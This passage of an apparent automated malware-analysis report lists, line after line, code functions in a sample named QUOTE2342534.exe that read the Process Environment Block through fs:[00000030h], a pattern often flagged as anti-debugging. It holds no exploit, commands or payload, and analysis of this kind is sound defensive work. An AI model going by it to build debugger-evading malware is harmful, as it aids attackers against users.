            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730535 mov eax, dword ptr fs:[00000030h]4_2_01730535
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E53E mov eax, dword ptr fs:[00000030h]4_2_0174E53E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E53E mov eax, dword ptr fs:[00000030h]4_2_0174E53E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E53E mov eax, dword ptr fs:[00000030h]4_2_0174E53E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E53E mov eax, dword ptr fs:[00000030h]4_2_0174E53E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E53E mov eax, dword ptr fs:[00000030h]4_2_0174E53E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B6500 mov eax, dword ptr fs:[00000030h]4_2_017B6500
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F4500 mov eax, dword ptr fs:[00000030h]4_2_017F4500
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017225E0 mov eax, dword ptr fs:[00000030h]4_2_017225E0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E5E7 mov eax, dword ptr fs:[00000030h]4_2_0174E5E7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175C5ED mov eax, dword ptr fs:[00000030h]4_2_0175C5ED
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175C5ED mov eax, dword ptr fs:[00000030h]4_2_0175C5ED
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017265D0 mov eax, dword ptr fs:[00000030h]4_2_017265D0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175A5D0 mov eax, dword ptr fs:[00000030h]4_2_0175A5D0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175A5D0 mov eax, dword ptr fs:[00000030h]4_2_0175A5D0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E5CF mov eax, dword ptr fs:[00000030h]4_2_0175E5CF
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E5CF mov eax, dword ptr fs:[00000030h]4_2_0175E5CF
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017445B1 mov eax, dword ptr fs:[00000030h]4_2_017445B1
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017445B1 mov eax, dword ptr fs:[00000030h]4_2_017445B1
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A05A7 mov eax, dword ptr fs:[00000030h]4_2_017A05A7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A05A7 mov eax, dword ptr fs:[00000030h]4_2_017A05A7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A05A7 mov eax, dword ptr fs:[00000030h]4_2_017A05A7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E59C mov eax, dword ptr fs:[00000030h]4_2_0175E59C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01722582 mov eax, dword ptr fs:[00000030h]4_2_01722582
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01722582 mov ecx, dword ptr fs:[00000030h]4_2_01722582
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01754588 mov eax, dword ptr fs:[00000030h]4_2_01754588
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174A470 mov eax, dword ptr fs:[00000030h]4_2_0174A470
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174A470 mov eax, dword ptr fs:[00000030h]4_2_0174A470
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174A470 mov eax, dword ptr fs:[00000030h]4_2_0174A470
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017AC460 mov ecx, dword ptr fs:[00000030h]4_2_017AC460
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017DA456 mov eax, dword ptr fs:[00000030h]4_2_017DA456
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171645D mov eax, dword ptr fs:[00000030h]4_2_0171645D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174245A mov eax, dword ptr fs:[00000030h]4_2_0174245A
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175E443 mov eax, dword ptr fs:[00000030h]4_2_0175E443
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175A430 mov eax, dword ptr fs:[00000030h]4_2_0175A430
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171E420 mov eax, dword ptr fs:[00000030h]4_2_0171E420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171E420 mov eax, dword ptr fs:[00000030h]4_2_0171E420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171E420 mov eax, dword ptr fs:[00000030h]4_2_0171E420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171C427 mov eax, dword ptr fs:[00000030h]4_2_0171C427
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A6420 mov eax, dword ptr fs:[00000030h]4_2_017A6420
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01758402 mov eax, dword ptr fs:[00000030h]4_2_01758402
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01758402 mov eax, dword ptr fs:[00000030h]4_2_01758402
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01758402 mov eax, dword ptr fs:[00000030h]4_2_01758402
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017204E5 mov ecx, dword ptr fs:[00000030h]4_2_017204E5
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017544B0 mov ecx, dword ptr fs:[00000030h]4_2_017544B0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017AA4B0 mov eax, dword ptr fs:[00000030h]4_2_017AA4B0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017264AB mov eax, dword ptr fs:[00000030h]4_2_017264AB
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017DA49A mov eax, dword ptr fs:[00000030h]4_2_017DA49A
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01728770 mov eax, dword ptr fs:[00000030h]4_2_01728770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01720750 mov eax, dword ptr fs:[00000030h]4_2_01720750
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762750 mov eax, dword ptr fs:[00000030h]4_2_01762750
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762750 mov eax, dword ptr fs:[00000030h]4_2_01762750
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017AE75D mov eax, dword ptr fs:[00000030h]4_2_017AE75D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A4755 mov eax, dword ptr fs:[00000030h]4_2_017A4755
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175674D mov esi, dword ptr fs:[00000030h]4_2_0175674D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175674D mov eax, dword ptr fs:[00000030h]4_2_0175674D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175674D mov eax, dword ptr fs:[00000030h]4_2_0175674D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175273C mov eax, dword ptr fs:[00000030h]4_2_0175273C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175273C mov ecx, dword ptr fs:[00000030h]4_2_0175273C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175273C mov eax, dword ptr fs:[00000030h]4_2_0175273C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179C730 mov eax, dword ptr fs:[00000030h]4_2_0179C730
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175C720 mov eax, dword ptr fs:[00000030h]4_2_0175C720
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175C720 mov eax, dword ptr fs:[00000030h]4_2_0175C720
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01720710 mov eax, dword ptr fs:[00000030h]4_2_01720710
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01750710 mov eax, dword ptr fs:[00000030h]4_2_01750710
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175C700 mov eax, dword ptr fs:[00000030h]4_2_0175C700
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017247FB mov eax, dword ptr fs:[00000030h]4_2_017247FB
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017247FB mov eax, dword ptr fs:[00000030h]4_2_017247FB
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017427ED mov eax, dword ptr fs:[00000030h]4_2_017427ED
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017427ED mov eax, dword ptr fs:[00000030h]4_2_017427ED
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017427ED mov eax, dword ptr fs:[00000030h]4_2_017427ED
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017AE7E1 mov eax, dword ptr fs:[00000030h]4_2_017AE7E1
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172C7C0 mov eax, dword ptr fs:[00000030h]4_2_0172C7C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A07C3 mov eax, dword ptr fs:[00000030h]4_2_017A07C3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017207AF mov eax, dword ptr fs:[00000030h]4_2_017207AF
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D47A0 mov eax, dword ptr fs:[00000030h]4_2_017D47A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C678E mov eax, dword ptr fs:[00000030h]4_2_017C678E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01752674 mov eax, dword ptr fs:[00000030h]4_2_01752674
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E866E mov eax, dword ptr fs:[00000030h]4_2_017E866E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E866E mov eax, dword ptr fs:[00000030h]4_2_017E866E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175A660 mov eax, dword ptr fs:[00000030h]4_2_0175A660
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175A660 mov eax, dword ptr fs:[00000030h]4_2_0175A660
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173C640 mov eax, dword ptr fs:[00000030h]4_2_0173C640
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173E627 mov eax, dword ptr fs:[00000030h]4_2_0173E627
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01756620 mov eax, dword ptr fs:[00000030h]4_2_01756620
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01758620 mov eax, dword ptr fs:[00000030h]4_2_01758620
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172262C mov eax, dword ptr fs:[00000030h]4_2_0172262C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01762619 mov eax, dword ptr fs:[00000030h]4_2_01762619
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179E609 mov eax, dword ptr fs:[00000030h]4_2_0179E609
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179E6F2 mov eax, dword ptr fs:[00000030h]4_2_0179E6F2
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179E6F2 mov eax, dword ptr fs:[00000030h]4_2_0179E6F2
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179E6F2 mov eax, dword ptr fs:[00000030h]4_2_0179E6F2
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179E6F2 mov eax, dword ptr fs:[00000030h]4_2_0179E6F2
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A06F1 mov eax, dword ptr fs:[00000030h]4_2_017A06F1
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A06F1 mov eax, dword ptr fs:[00000030h]4_2_017A06F1
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0175A6C7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175A6C7 mov eax, dword ptr fs:[00000030h]4_2_0175A6C7
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017566B0 mov eax, dword ptr fs:[00000030h]4_2_017566B0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175C6A6 mov eax, dword ptr fs:[00000030h]4_2_0175C6A6
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01724690 mov eax, dword ptr fs:[00000030h]4_2_01724690
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01724690 mov eax, dword ptr fs:[00000030h]4_2_01724690
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C4978 mov eax, dword ptr fs:[00000030h]4_2_017C4978
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C4978 mov eax, dword ptr fs:[00000030h]4_2_017C4978
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017AC97C mov eax, dword ptr fs:[00000030h]4_2_017AC97C
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01746962 mov eax, dword ptr fs:[00000030h]4_2_01746962
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01746962 mov eax, dword ptr fs:[00000030h]4_2_01746962
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01746962 mov eax, dword ptr fs:[00000030h]4_2_01746962
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0176096E mov eax, dword ptr fs:[00000030h]4_2_0176096E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0176096E mov edx, dword ptr fs:[00000030h]4_2_0176096E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0176096E mov eax, dword ptr fs:[00000030h]4_2_0176096E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A0946 mov eax, dword ptr fs:[00000030h]4_2_017A0946
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A892A mov eax, dword ptr fs:[00000030h]4_2_017A892A
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B892B mov eax, dword ptr fs:[00000030h]4_2_017B892B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017AC912 mov eax, dword ptr fs:[00000030h]4_2_017AC912
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01718918 mov eax, dword ptr fs:[00000030h]4_2_01718918
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01718918 mov eax, dword ptr fs:[00000030h]4_2_01718918
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179E908 mov eax, dword ptr fs:[00000030h]4_2_0179E908
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179E908 mov eax, dword ptr fs:[00000030h]4_2_0179E908
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017529F9 mov eax, dword ptr fs:[00000030h]4_2_017529F9
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017529F9 mov eax, dword ptr fs:[00000030h]4_2_017529F9
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017AE9E0 mov eax, dword ptr fs:[00000030h]4_2_017AE9E0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A9D0 mov eax, dword ptr fs:[00000030h]4_2_0172A9D0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A9D0 mov eax, dword ptr fs:[00000030h]4_2_0172A9D0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A9D0 mov eax, dword ptr fs:[00000030h]4_2_0172A9D0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A9D0 mov eax, dword ptr fs:[00000030h]4_2_0172A9D0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A9D0 mov eax, dword ptr fs:[00000030h]4_2_0172A9D0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172A9D0 mov eax, dword ptr fs:[00000030h]4_2_0172A9D0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017549D0 mov eax, dword ptr fs:[00000030h]4_2_017549D0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017EA9D3 mov eax, dword ptr fs:[00000030h]4_2_017EA9D3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B69C0 mov eax, dword ptr fs:[00000030h]4_2_017B69C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A89B3 mov esi, dword ptr fs:[00000030h]4_2_017A89B3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A89B3 mov eax, dword ptr fs:[00000030h]4_2_017A89B3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017A89B3 mov eax, dword ptr fs:[00000030h]4_2_017A89B3
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017209AD mov eax, dword ptr fs:[00000030h]4_2_017209AD
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017209AD mov eax, dword ptr fs:[00000030h]4_2_017209AD
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017AE872 mov eax, dword ptr fs:[00000030h]4_2_017AE872
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017AE872 mov eax, dword ptr fs:[00000030h]4_2_017AE872
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B6870 mov eax, dword ptr fs:[00000030h]4_2_017B6870
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B6870 mov eax, dword ptr fs:[00000030h]4_2_017B6870
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01750854 mov eax, dword ptr fs:[00000030h]4_2_01750854
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01724859 mov eax, dword ptr fs:[00000030h]4_2_01724859
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01724859 mov eax, dword ptr fs:[00000030h]4_2_01724859
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01732840 mov ecx, dword ptr fs:[00000030h]4_2_01732840
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01742835 mov eax, dword ptr fs:[00000030h]4_2_01742835
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01742835 mov eax, dword ptr fs:[00000030h]4_2_01742835
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01742835 mov eax, dword ptr fs:[00000030h]4_2_01742835
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01742835 mov ecx, dword ptr fs:[00000030h]4_2_01742835
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01742835 mov eax, dword ptr fs:[00000030h]4_2_01742835
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01742835 mov eax, dword ptr fs:[00000030h]4_2_01742835
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175A830 mov eax, dword ptr fs:[00000030h]4_2_0175A830
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C483A mov eax, dword ptr fs:[00000030h]4_2_017C483A
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C483A mov eax, dword ptr fs:[00000030h]4_2_017C483A
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017AC810 mov eax, dword ptr fs:[00000030h]4_2_017AC810
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175C8F9 mov eax, dword ptr fs:[00000030h]4_2_0175C8F9
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175C8F9 mov eax, dword ptr fs:[00000030h]4_2_0175C8F9
